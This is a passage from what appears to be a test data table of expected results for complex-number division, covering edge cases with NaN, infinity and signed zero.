2), complex(inf, inf)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(-1, zero), complex(nan, -inf)}, {complex(nan, inf), complex(-1, -zero), complex(nan, -inf)}, {complex(nan, inf), complex(-1, 1), complex(inf, -inf)}, {complex(nan, inf), complex(-1, -1), complex(-inf, -inf)}, {complex(nan, inf), complex(-1, 2), complex(inf, -inf)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(2, zero), complex(nan, inf)}, {complex(nan, inf), complex(2, -zero), complex(nan, inf)}, {complex(nan, inf), complex(2, 1), complex(inf, inf)}, {complex(nan, inf), complex(2, -1), complex(-inf, inf)}, {complex(nan, inf), complex(2, 2), complex(inf, inf)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, zero), complex(nan, nan)}, {complex(nan, inf), complex(nan, -zero), complex(nan, nan)}, {complex(nan, inf), complex(nan, 1), complex(nan, nan)}, {complex(nan, inf), complex(nan, -1), complex(nan, nan)}, {complex(nan, inf), complex(nan, 2), complex(nan, nan)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(inf, zero), complex(nan, nan)}, {complex(nan, inf), complex(inf, -zero), complex(nan, nan)}, {complex(nan, inf), complex(inf, 1), complex(nan, nan)}, {complex(nan, inf), complex(inf, -1), complex(nan, nan)}, {complex(nan, inf), complex(inf, 2), complex(nan, nan)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(-inf, zero), complex(nan, nan)}, {complex(nan, inf), complex(-inf, -zero), complex(nan, nan)}, {complex(nan, inf), complex(-inf, 1), complex(nan, nan)}, {complex(nan, inf), complex(-inf, -1), complex(nan, nan)}, {complex(nan, inf), complex(-inf, 2), complex(nan, nan)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(zero, zero), complex(nan, -inf)}, {complex(nan, -inf), complex(zero, -zero), complex(nan, -inf)}, {complex(nan, -inf), complex(zero, 1), complex(-inf, nan)}, {complex(nan, -inf), complex(zero, -1), complex(inf, nan)}, {complex(nan, -inf), complex(zero, 2), complex(-inf, nan)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(zero, zero), complex(nan, -inf)}, {complex(nan, -inf), complex(-zero, -zero), complex(nan, inf)}, {complex(nan, -inf), complex(zero, 1), complex(-inf, nan)}, {complex(nan, -inf), complex(-zero, -1), complex(inf, nan)}, {complex(nan, -inf), complex(zero, 2), complex(-inf, nan)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(1, zero), complex(nan, -inf)}, {complex(nan, -inf), complex(1, -zero), complex(nan, -inf)}, {complex(nan, -inf), complex(1, 1), complex(-inf, -inf)}, {complex(nan, -inf), complex(1, -1), complex(inf, -inf)}, {complex(nan, -inf), complex(1, 2), complex(-inf, -inf)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(-1, zero), complex(nan, inf)}, {complex(nan, -inf), complex(-1, -zero), complex(nan, inf)}, {complex(nan, -inf), complex(-1, 1), complex(-inf, inf)}, {complex(nan, -inf), complex(-1, -1), complex(inf, inf)}, {complex(nan, -inf), complex(-1, 2), complex(-inf, inf)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(2, zero), complex(nan, -inf)}, {complex(nan, -inf), complex(2, -zero), complex(nan, -inf)}, {complex(nan, -inf), complex(2, 1), complex(-inf, -inf)}, {complex(nan, -inf), complex(2, -1), complex(inf, -inf)}, {complex(nan, -inf), complex(2, 2), complex(-inf, -inf)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, zero), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -zero), complex(nan, nan)}, {complex(nan, -inf), complex(nan, 1), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -1), complex(nan, nan)}, {complex(nan, -inf), complex(nan, 2), complex(nan, nan)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(inf, zero), complex(nan, nan)}, {complex(nan, -inf), complex(inf, -zero), complex(nan, nan)}, {complex(nan, -inf), complex(inf, 1), complex(nan, nan)}, {complex(nan, -inf), complex(inf, -1), complex(nan, nan)}, {complex(nan, -inf), complex(inf, 2), complex(nan, nan)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(-inf, zero), complex(nan, nan)}, {complex(nan, -inf), complex(-inf, -zero), complex(nan, nan)}, {complex(nan, -inf), complex(-inf, 1), complex(nan, nan)}, {complex(nan, -inf), complex(-inf, -1), complex(nan, nan)}, {complex(nan, -inf), complex(-inf, 2), complex(nan, nan)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(-inf, zero), complex(zero, zero), complex(-inf, nan)}, {complex(-inf, zero), complex(zero, -zero), complex(-inf, nan)}, {complex(-inf, zero), complex(zero, 1), complex(nan, inf)}, {complex(-inf, zero), complex(zero, -1), complex(nan, -inf)}, {complex(-inf, zero), complex(zero, 2), complex(nan, inf)}, {complex(-inf, zero), complex(nan, nan), complex(nan, nan)}, {complex(-inf, zero), complex(nan, inf), complex(nan, nan)}, {complex(-inf, zero), complex(nan, -inf), complex(nan, nan)}, {complex(-inf, zero), complex(zero, zero), complex(-inf, nan)}, {complex(-inf, zero), complex(-zero, -zero), complex(inf, nan)}, {complex(-inf, zero), complex(zero, 1), complex(nan, inf)}, {complex(-inf, zero), complex(-zero, -1), complex(nan, -inf)}, {complex(-inf, zero), complex(zero, 2), complex(nan, inf)}, {complex(-inf, zero), complex(nan, nan), complex(nan, nan)}, {complex(-inf, zero), complex(nan, inf), complex(nan, nan)}, {complex(-inf, zero), complex(nan, -inf), complex(nan, nan)}, {complex(-inf, zero), complex(1, zero), complex(-inf, nan)}, {complex(-inf, zero), complex(1, -zero), complex(-inf, nan)}, {complex(-inf, zero), complex(1, 1), complex(-inf, inf)}, {complex(-inf, zero), complex(1, -1), complex(-inf, -inf)}, {complex(-inf, zero), complex(1, 2), complex(-inf, inf)}, {complex(-inf, zero), complex(nan, nan), complex(nan, nan)}, {complex(-inf, zero), complex(nan, inf), complex(nan, nan)}, {complex(-inf, zero), complex(nan, -inf), complex(nan, nan)}, {complex(-inf, zero), complex(-1, zero), complex(inf, nan)}, {complex(-inf, zero), complex(-1, -zero), complex(inf, nan)}, {complex(-inf, zero), complex(-1, 1), complex(inf, inf)}, {complex(-inf, zero), complex(-1, -1), complex(inf, -inf)}, {complex(-inf, zero), complex(-1, 2), complex(inf, inf)}, {complex(-inf, zero), complex(nan, nan), complex(nan, nan)}, {complex(-inf, zero), complex(nan, inf), complex(nan, nan)}, {complex(-inf, zero), complex(nan, -inf), complex(nan, nan)}, {complex(-inf, zero), complex(2, zero), complex(-inf, nan)}, {complex(-inf, zero), complex(2, -zero), complex(-inf, nan)}, {complex(-inf, zero), complex(2, 1), complex(-inf, inf)}, {complex(-inf, zero), complex(2, -1), complex(-inf, -inf)}, {complex(-inf, zero), complex(2, 2), complex(-inf, inf)}, {complex(-inf, zero), complex(nan, nan), complex(nan, nan)}, {complex(-inf, zero), complex(nan, inf), complex(nan, nan)}, {complex(-inf, zero), complex(nan, -inf), complex(nan, nan)}, {complex(-inf, zero), complex(nan, zero), complex(nan, nan)}, {complex(-inf, zero), complex(nan, -zero), complex(nan, nan)}, {complex(-inf, zero), complex(nan, 1), complex(nan, nan)}, {complex(-inf, zero), complex(nan, -1), complex(nan, nan)}, {complex(-inf, zero), complex(nan, 2), complex(nan, nan)}, {complex(-inf, zero), complex(nan, nan), complex(nan, nan)}, {complex(-inf, zero), complex(nan, inf), complex(nan, nan)}, {complex(-inf, zero), complex(nan, -inf), complex(nan, nan)}, {complex(-inf, zero), complex(inf, zero), complex(nan, nan)}, {complex(-inf, zero), complex(inf, -zero), complex(nan, nan)}, {complex(-inf, zero), complex(inf, 1), complex(nan, nan)}, {complex(-inf, zero), complex(inf, -1), complex(nan, nan)}, {complex(-inf, zero), complex(inf, 2), complex(nan, nan)}, {complex(-inf, zero), complex(nan, nan), complex(nan, nan)}, {complex(-inf, zero), complex(nan, inf), complex(nan, nan)}, {complex(-inf, zero), complex(nan, -inf), complex(nan, nan)}, {complex(-inf, zero), complex(-inf, zero), complex(nan, nan)}, {complex(-inf, zero), complex(-inf, -zero), complex(nan, nan)}, {complex(-inf, zero), complex(-inf, 1), complex(nan, nan)}, {complex(-inf, zero), complex(-inf, -1), complex(nan, nan)}, {complex(-inf, zero), complex(-inf, 2), complex(nan, nan)}, {complex(-inf, zero), complex(nan, nan), complex(nan, nan)}, {complex(-inf, zero), complex(nan, inf), complex(nan, nan)}, {complex(-inf, zero), complex(nan, -inf), complex(nan, nan)}, {complex(-inf, -zero), complex(zero, zero), complex(-inf, nan)}, {complex(-inf, -zero), complex(zero, -zero), complex(-inf, nan)}, {complex(-inf, -zero), complex(zero, 1), complex(nan, inf)}, {complex(-inf, -zero), complex(zero, -1), complex(nan, -inf)}, {complex(-inf, -zero), complex(zero, 2), complex(nan, inf)}, {complex(-inf, -zero), complex(nan, nan), complex(nan, nan)}, {complex(-inf, -zero), complex(nan, inf), complex(nan, nan)}, {complex(-inf, -zero), complex(nan, -inf), complex(nan, nan)}, {complex(-inf, -zero), complex(zero, zero), complex(-inf, nan)}, {complex(-inf, -zero), complex(-zero, -zero), complex(inf, nan)}, {complex(-inf, -zero), complex(zero, 1), complex(nan, inf)}, {complex(-inf, -zero), complex(-zero, -1), complex(nan, -inf)}, {complex(-inf, -zero), complex(zero, 2), complex(nan, inf)}, {complex(-inf, -zero), complex(nan, nan), complex(nan, nan)}, {complex(-inf, -zero), complex(nan, inf), complex(nan, nan)}, {complex(-inf, -zero), complex(nan, -inf), complex(nan, nan)}, {complex(-inf, -zero), complex(1, zero), complex(-inf, nan)}, {complex(-inf, -zero), complex(1, -zero), complex(-inf, nan)}, {complex(-inf, -zero), complex(1, 1), complex(-inf, inf)}, {complex(-inf, -zero), complex(1, -1), complex(-inf, -inf)}, {complex(-inf, -zero), complex(1, 2), complex(-inf, inf)}, {complex(-inf, -zero), complex(nan, nan), complex(nan, nan)}, {complex(-inf, -zero), complex(nan, inf), complex(nan, nan)}, {complex(-inf, -zero), complex(nan, -inf), complex(nan, nan)}, {complex(-inf, -zero), complex(-1, zero), complex(inf, nan)}, {complex(-inf, -zero), complex(-1, -zero), complex(inf, nan)}, {complex(-inf, -zero), complex(-1, 1), complex(inf, inf)}, {complex(-inf, -zero), complex(-1, -1), complex(inf, -inf)}, {complex(-inf, -zero), complex(-1, 2), complex(inf, inf)}, {complex(-inf, -zero), complex(nan, nan), complex(nan, nan)}, {complex(-inf, -zero), complex(nan, inf), complex(nan, nan)}, {complex(-inf, -zero), complex(nan, -inf), complex(nan, nan)}, {complex(-inf, -zero), complex(2, zero), complex(-inf, nan)}, {complex(-inf, -zero), complex(2, -zero), complex(-inf, nan)}, {complex(-inf, -zero), complex(2, 1), complex(-inf, inf)}, {complex(-inf, -zero), complex(2, -1), complex(-inf, -inf)}, {complex(-inf, -zero), complex(2, 2), complex(-inf, inf)}, {complex(-inf, -zero), complex(nan, nan), complex(nan, nan)}, {complex(-inf, -zero), complex(nan, inf), complex(nan, nan)}, {complex(-inf, -zero), complex(nan, -inf), complex(nan, nan)}, {complex(-inf, -zero), complex(nan, zero), complex(nan, nan)}, {complex(-inf, -zero), complex(nan, -zero), complex(nan, nan)}, {complex(-inf, -zero), complex(nan, 1), complex(nan, nan)}, {complex(-inf, -zero), complex(nan, -1), complex(nan, nan)}, {complex(-inf, -zero), complex(nan, 2), complex(nan, nan)}, {complex(-inf, -zero), complex(nan, nan), complex(nan, nan)}, {complex(-inf, -zero), complex(nan, inf), complex(nan, nan)}, {complex(-inf, -zero), complex(nan, -inf), complex(nan, nan)}, {complex(-inf, -zero), complex(inf, zero), complex(nan, nan)}, {complex(-inf, -zero), complex(inf, -zero), complex(nan, nan)}, {complex(-inf, -zero), complex(inf, 1), complex(nan, nan)}, {complex(-inf, -zero), complex(inf, -1), complex(nan, nan)}, {complex(-inf, -zero), complex(inf, 2), complex(nan, nan)}, {complex(-inf, -zero), complex(nan, nan), complex(nan, nan)}, {complex(-inf, -zero), complex(nan, inf), complex(nan, nan)}, {complex(-inf, -zero), complex(nan, -inf), complex(nan, nan)}, {complex(-inf, -zero), complex(-inf, zero), complex(nan, nan)}, {complex(-inf, -zero), complex(-inf, -zero), complex(nan, nan)}, {complex(-inf, -zero), complex(-inf, 1), complex(nan, nan)}, {complex(-inf, -zero), complex(-inf, -1), complex(nan, nan)}, {complex(-inf, -zero), complex(-inf, 2), complex(nan, nan)}, {complex(-inf, -zero), complex(nan, nan), complex(nan, nan)}, {complex(-inf, -zero), complex(nan, inf), complex(nan, nan)}, {complex(-inf, -zero), complex(nan, -inf), complex(nan, nan)}, {complex(-inf, 1), complex(zero, zero), complex(-inf, inf)}, {complex(-inf, 1), complex(zero, -zero), complex(-inf, inf)}, {complex(-inf, 1), complex(zero, 1), complex(nan, inf)}, {complex(-inf, 1), complex(zero, -1), complex(nan, -inf)}, {complex(-inf, 1), complex(zero, 2), complex(nan, inf)}, {complex(-inf, 1), complex(nan, nan), complex(nan, nan)}, {complex(-inf, 1), complex(nan, inf), complex(nan, nan)}, {complex(-inf, 1), complex(nan, -inf), complex(nan, nan)}, {complex(-inf, 1), complex(zero, zero), complex(-inf, inf)}, {complex(-inf, 1), complex(-zero, -zero), complex(inf, -inf)}, {complex(-inf, 1), complex(zero, 1), complex(nan, inf)}, {complex(-inf, 1), complex(-zero, -1), complex(nan, -inf)}, {complex(-inf, 1), complex(zero, 2), complex(nan, inf)}, {complex(-inf, 1), complex(nan, nan), complex(nan, nan)}, {complex(-inf, 1), complex(nan, inf), complex(nan, nan)}, {complex(-inf, 1), complex(nan, -inf), complex(nan, nan)}, {complex(-inf, 1), complex(1, zero), complex(-inf, nan)}, {complex(-inf, 1), complex(1, -zero), complex(-inf, nan)}, {complex(-inf, 1), complex(1, 1), complex(-inf, inf)}, {complex(-inf, 1), complex(1, -1), complex(-inf, -inf)}, {complex(-inf, 1), complex(1, 2), complex(-inf, inf)}, {complex(-inf, 1), complex(nan, nan), complex(nan, nan)}, {complex(-inf, 1), complex(nan, inf), complex(nan, nan)}, {complex(-inf, 1), complex(nan, -inf), complex(nan, nan)}, {complex(-inf, 1), complex(-1, zero), complex(inf, nan)}, {complex(-inf, 1), complex(-1, -zero), complex(inf, nan)}, {complex(-inf, 1), complex(-1, 1), complex(inf, inf)}, {complex(-inf, 1), complex(-1, -1), complex(inf, -inf)}, {complex(-inf, 1), complex(-1, 2), complex(inf, inf)}, {complex(-inf, 1), complex(nan, nan), complex(nan, nan)}, {complex(-inf, 1), complex(nan, inf), complex(nan, nan)}, {complex(-inf, 1), complex(nan, -inf), complex(nan, nan)}, {complex(-inf, 1), complex(2, zero), complex(-inf, nan)}, {complex(-inf, 1), complex(2, -zero), complex(-inf, nan)}, {complex(-inf, 1), complex(2, 1), complex(-inf, inf)}, {complex(-inf, 1), complex(2, -1), complex(-inf, -inf)}, {complex(-inf, 1), complex(2, 2), complex(-inf, inf)}, {complex(-inf, 1), complex(nan, nan), complex(nan, nan)}, {complex(-inf, 1), complex(nan, inf), complex(nan, nan)}, {complex(-inf, 1), complex(nan, -inf), complex(nan, nan)}, {complex(-inf, 1), complex(nan, zero), complex(nan, nan)}, {complex(-inf, 1), complex(nan, -zero), complex(nan, nan)}, {complex(-inf, 1), complex(nan, 1), complex(nan, nan)}, {complex(-inf, 1), complex(nan, -1), complex(nan, nan)}, {complex(-inf, 1), complex(nan, 2), complex(nan, nan)}, {complex(-inf, 1), complex(nan, nan), complex(nan, nan)}, {complex(-inf, 1), complex(nan, inf), complex(nan, nan)}, {complex(-inf, 1), complex(nan, -inf), complex(nan, nan)}, {complex(-inf, 1), complex(inf, zero), complex(nan, nan)}, {complex(-inf, 1), complex(inf, -zero), complex(nan, nan)}, {complex(-inf, 1), complex(inf, 1), complex(nan, nan)}, {complex(-inf, 1), complex(inf, -1), complex(nan, nan)}, {complex(-inf, 1), complex(inf, 2), complex(nan, nan)}, {complex(-inf, 1), complex(nan, nan), complex(nan, nan)}, {complex(-inf, 1), complex(nan, inf), complex(nan, nan)}, {complex(-inf, 1), complex(nan, -inf), complex(nan, nan)}, {complex(-inf, 1), complex(-inf, zero), complex(nan, nan)}, {complex(-inf, 1), complex(-inf, -zero), complex(nan, nan)}, {complex(-inf, 1), complex(-inf, 1), complex(nan, nan)}, {complex(-inf, 1), complex(-inf, -1), complex(nan, nan)}, {complex(-inf, 1), complex(-inf, 2), complex(nan, nan)}, {complex(-inf, 1), complex(nan, nan), complex(nan, nan)}, {complex(-inf, 1), complex(nan, inf), complex(nan, nan)}, {complex(-inf, 1), complex(nan, -inf), complex(nan, nan)}, {complex(-inf, -1), complex(zero, zero), complex(-inf, -inf)}, {complex(-inf, -1), complex(zero, -zero), complex(-inf, -inf)}, {complex(-inf, -1), complex(zero, 1), complex(nan, inf)}, {complex(-inf, -1), complex(zero, -1), complex(nan, -inf)}, {complex(-inf, -1), complex(zero, 2), complex(nan, inf)}, {complex(-inf, -1), complex(nan, nan), complex(nan, nan)}, {complex(-inf, -1), complex(nan, inf), complex(nan, nan)}, {complex(-inf, -1), complex(nan, -inf), complex(nan, nan)}, {complex(-inf, -1), complex(zero, zero), complex(-inf, -inf)}, {complex(-inf, -1), complex(-zero, -zero), complex(inf, inf)}, {complex(-inf, -1), complex(zero, 1), complex(nan, inf)}, {complex(-inf, -1), complex(-zero, -1), complex(nan, -inf)}, {complex(-inf, -1), complex(zero, 2), complex(nan, inf)}, {complex(-inf, -1), complex(nan, nan), complex(nan, nan)}, {complex(-inf, -1), complex(nan, inf), complex(nan, nan)}, {complex(-inf, -1), complex(nan, -inf), complex(nan, nan)}, {complex(-inf, -1), complex(1, zero), complex(-inf, nan)}, {complex(-inf, -1), complex(1, -zero), complex(-inf, nan)}, {complex(-inf, -1), complex(1, 1), complex(-inf, inf)}, {complex(-inf, -1), complex(1, -1), complex(-inf, -inf)}, {complex(-inf, -1), complex(1, 2), complex(-inf, inf)}, {complex(-inf, -1), complex(nan, nan), complex(nan, nan)}, {complex(-inf, -1), complex(nan, inf), complex(nan, nan)}, {complex(-inf, -1), complex(nan, -inf), complex(nan, nan)}, {complex(-inf, -1), complex(-1, zero), complex(inf, nan)}, {complex(-inf, -1), complex(-1, -zero), complex(inf, nan)}, {complex(-inf, -1), complex(-1, 1), complex(inf, inf)}, {complex(-inf, -1), complex(-1, -1), complex(inf, -inf)}, {complex(-inf, -1), complex(-1, 2), complex(inf, inf)}, {complex(-inf, -1), complex(nan, nan), complex(nan, nan)}, {complex(-inf, -1), complex(nan, inf), complex(nan, nan)}, {complex(-inf, -1), complex(nan, -inf), complex(nan, nan)}, {complex(-inf, -1), complex(2, zero), complex(-inf, nan)}, {complex(-inf, -1), complex(2, -zero), complex(-inf, nan)}, {complex(-inf, -1), complex(2, 1), complex(-inf, inf)}, {complex(-inf, -1), complex(2, -1), complex(-inf, -inf)}, {complex(-inf, -1), complex(2, 2), complex(-inf, inf)}, {complex(-inf, -1), complex(nan, nan), complex(nan, nan)}, {complex(-inf, -1), complex(nan, inf), complex(nan, nan)}, {complex(-inf, -1), complex(nan, -inf), complex(nan, nan)}, {complex(-inf, -1), complex(nan, zero), complex(nan, nan)}, {complex(-inf, -1), complex(nan, -zero), complex(nan, nan)}, {complex(-inf, -1), complex(nan, 1), complex(nan, nan)}, {complex(-inf, -1), complex(nan, -1), complex(nan, nan)}, {complex(-inf, -1), complex(nan, 2), complex(nan, nan)}, {complex(-inf, -1), complex(nan, nan), complex(nan, nan)}, {complex(-inf, -1), complex(nan, inf), complex(nan, nan)}, {complex(-inf, -1), complex(nan, -inf), complex(nan, nan)}, {complex(-inf, -1), complex(inf, zero), complex(nan, nan)}, {complex(-inf, -1), complex(inf, -zero), complex(nan, nan)}, {complex(-inf, -1), complex(inf, 1), complex(nan, nan)}, {complex(-inf, -1), complex(inf, -1), complex(nan, nan)}, {complex(-inf, -1), complex(inf, 2), complex(nan, nan)}, {complex(-inf, -1), complex(nan, nan), complex(nan, nan)}, {complex(-inf, -1), complex(nan, inf), complex(nan, nan)}, {complex(-inf, -1), complex(nan, -inf), complex(nan, nan)}, {complex(-inf, -1), complex(-inf, zero), complex(nan, nan)}, {complex(-inf, -1), complex(-inf, -zero), complex(nan, nan)}, {complex(-inf, -1), complex(-inf, 1), complex(nan, nan)}, {complex(-inf, -1), complex(-inf, -1), complex(nan, nan)}, {complex(-inf, -1), complex(-inf, 2), complex(nan, nan)}, {complex(-inf, -1), complex(nan, nan), complex(nan, nan)}, {complex(-inf, -1), complex(nan, inf), complex(nan, nan)}, {complex(-inf, -1), complex(nan, -inf), complex(nan, nan)}, {complex(-inf, 2), complex(zero, zero), complex(-inf, inf)}, {complex(-inf, 2), complex(zero, -zero), complex(-inf, inf)}, {complex(-inf, 2), complex(zero, 1), complex(nan, inf)}, {complex(-inf, 2), complex(zero, -1), complex(nan, -inf)}, {complex(-inf, 2), complex(zero, 2), complex(nan, inf)}, {complex(-inf, 2), complex(nan, nan), complex(nan, nan)}, {complex(-inf, 2), complex(nan, inf), complex(nan, nan)}, {complex(-inf, 2), complex(nan, -inf), complex(nan, nan)}, {complex(-inf, 2), complex(zero, zero), complex(-inf, inf)}, {complex(-inf, 2), complex(-zero, -zero), complex(inf, -inf)}, {complex(-inf, 2), complex(zero, 1), complex(nan, inf)}, {complex(-inf, 2), complex(-zero, -1), complex(nan, -inf)}, {complex(-inf, 2), complex(zero, 2), complex(nan, inf)}, {complex(-inf, 2), complex(nan, nan), complex(nan, nan)}, {complex(-inf, 2), complex(nan, inf), complex(nan, nan)}, {complex(-inf, 2), complex(nan, -inf), complex(nan, nan)}, {complex(-inf, 2), complex(1, zero), complex(-inf, nan)}, {complex(-inf, 2), complex(1, -zero), complex(-inf, nan)}, {complex(-inf, 2), complex(1, 1), complex(-inf, inf)}, {complex(-inf, 2), complex(1, -1), complex(-inf, -inf)}, {complex(-inf, 2), complex(1, 2), complex(-inf, inf)}, {complex(-inf, 2), complex(nan, nan), complex(nan, nan)}, {complex(-inf, 2), complex(nan, inf), complex(nan, nan)}, {complex(-inf, 2), complex(nan, -inf), complex(nan, nan)}, {complex(-inf, 2), complex(-1, zero), complex(inf, nan)}, {complex(-inf, 2), complex(-1, -zero), complex(inf, nan)}, {complex(-inf, 2), complex(-1, 1), complex(inf, inf)}, {complex(-inf, 2), complex(-1, -1), complex(inf, -inf)}, {complex(-inf, 2), complex(-1, 2), complex(inf, inf)}, {complex(-inf, 2), complex(nan, nan), complex(nan, nan)}, {complex(-inf, 2), complex(nan, inf), complex(nan, nan)}, {complex(-inf, 2), complex(nan, -inf), complex(nan, nan)}, {complex(-inf, 2), complex(2, zero), complex(-inf, nan)}, {complex(-inf, 2), complex(2, -zero), complex(-inf, nan)}, {complex(-inf, 2), complex(2, 1), complex(-inf, inf)}, {complex(-inf, 2), complex(2, -1), complex(-inf, -inf)}, {complex(-inf, 2), complex(2, 2), complex(-inf, inf)}, {complex(-inf, 2), complex(nan, nan), complex(nan, nan)}, {complex(-inf, 2), complex(nan, inf), complex(nan, nan)}, {complex(-inf, 2), complex(nan, -inf), complex(nan, nan)}, {complex(-inf, 2), complex(nan, zero), complex(nan, nan)}, {complex(-inf, 2), complex(nan, -zero), complex(nan, nan)}, {complex(-inf, 2), complex(nan, 1), complex(nan, nan)}, {complex(-inf, 2), complex(nan, -1), complex(nan, nan)}, {complex(-inf, 2), complex(nan, 2), complex(nan, nan)}, {complex(-inf, 2), complex(nan, nan), complex(nan, nan)}, {complex(-inf, 2), complex(nan, inf), complex(nan, nan)}, {complex(-inf, 2), complex(nan, -inf), complex(nan, nan)}, {complex(-inf, 2), complex(inf, zero), complex(nan, nan)}, {complex(-inf, 2), complex(inf, -zero), complex(nan, nan)}, {complex(-inf, 2), complex(inf, 1), complex(nan, nan)}, {complex(-inf, 2), complex(inf, -1), complex(nan, nan)}, {complex(-inf, 2), complex(inf, 2), complex(nan, nan)}, {complex(-inf, 2), complex(nan, nan), complex(nan, nan)}, {complex(-inf, 2), complex(nan, inf), complex(nan, nan)}, {complex(-inf, 2), complex(nan, -inf), complex(nan, nan)}, {complex(-inf, 2), complex(-inf, zero), complex(nan, nan)}, {complex(-inf, 2), complex(-inf, -zero), complex(nan, nan)}, {complex(-inf, 2), complex(-inf, 1), complex(nan, nan)}, {complex(-inf, 2), complex(-inf, -1), complex(nan, nan)}, {complex(-inf, 2), complex(-inf, 2), complex(nan, nan)}, {complex(-inf, 2), complex(nan, nan), complex(nan, nan)}, {complex(-inf, 2), complex(nan, inf), complex(nan, nan)}, {complex(-inf, 2), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(zero, zero), complex(nan, nan)}, {complex(nan, nan), complex(zero, -zero), complex(nan, nan)}, {complex(nan, nan), complex(zero, 1), complex(nan, nan)}, {complex(nan, nan), complex(zero, -1), complex(nan, nan)}, {complex(nan, nan), complex(zero, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(zero, zero), complex(nan, nan)}, {complex(nan, nan), complex(-zero, -zero), complex(nan, nan)}, {complex(nan, nan), complex(zero, 1), complex(nan, nan)}, {complex(nan, nan), complex(-zero, -1), complex(nan, nan)}, {complex(nan, nan), complex(zero, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(1, zero), complex(nan, nan)}, {complex(nan, nan), complex(1, -zero), complex(nan, nan)}, {complex(nan, nan), complex(1, 1), complex(nan, nan)}, {complex(nan, nan), complex(1, -1), complex(nan, nan)}, {complex(nan, nan), complex(1, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(-1, zero), complex(nan, nan)}, {complex(nan, nan), complex(-1, -zero), complex(nan, nan)}, {complex(nan, nan), complex(-1, 1), complex(nan, nan)}, {complex(nan, nan), complex(-1, -1), complex(nan, nan)}, {complex(nan, nan), complex(-1, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(2, zero), complex(nan, nan)}, {complex(nan, nan), complex(2, -zero), complex(nan, nan)}, {complex(nan, nan), complex(2, 1), complex(nan, nan)}, {complex(nan, nan), complex(2, -1), complex(nan, nan)}, {complex(nan, nan), complex(2, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, zero), complex(nan, nan)}, {complex(nan, nan), complex(nan, -zero), complex(nan, nan)}, {complex(nan, nan), complex(nan, 1), complex(nan, nan)}, {complex(nan, nan), complex(nan, -1), complex(nan, nan)}, {complex(nan, nan), complex(nan, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(inf, zero), complex(nan, nan)}, {complex(nan, nan), complex(inf, -zero), complex(nan, nan)}, {complex(nan, 